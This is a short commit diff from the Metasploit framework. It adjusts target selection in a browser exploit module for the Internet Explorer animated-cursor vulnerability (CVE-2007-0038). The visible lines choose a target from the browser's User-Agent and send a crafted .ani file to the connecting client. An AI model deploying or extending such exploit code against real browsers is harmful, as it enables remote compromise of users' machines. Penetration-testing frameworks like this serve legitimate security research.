Minor updates for targetting

git-svn-id: file:///home/svn/framework3/trunk@4606 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-02 03:10:01 +00:00
parent aba1959d44
commit b16fc9fd53
1 changed files with 3 additions and 2 deletions

View File

@ -127,6 +127,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
def on_request_uri(cli, request)
mytarget = self.target
ros = /.*/
case request.headers['User-Agent']
@ -187,7 +188,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Set the requested target
if (targ and targets[targ])
target = targets[targ]
mytarget = targets[targ]
end
# Re-generate the payload, using the explicit target
@ -196,7 +197,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' })
send_response(cli, generate_ani(p, mytarget), { 'Content-Type' => 'application/octet-stream' })
handler(cli)
end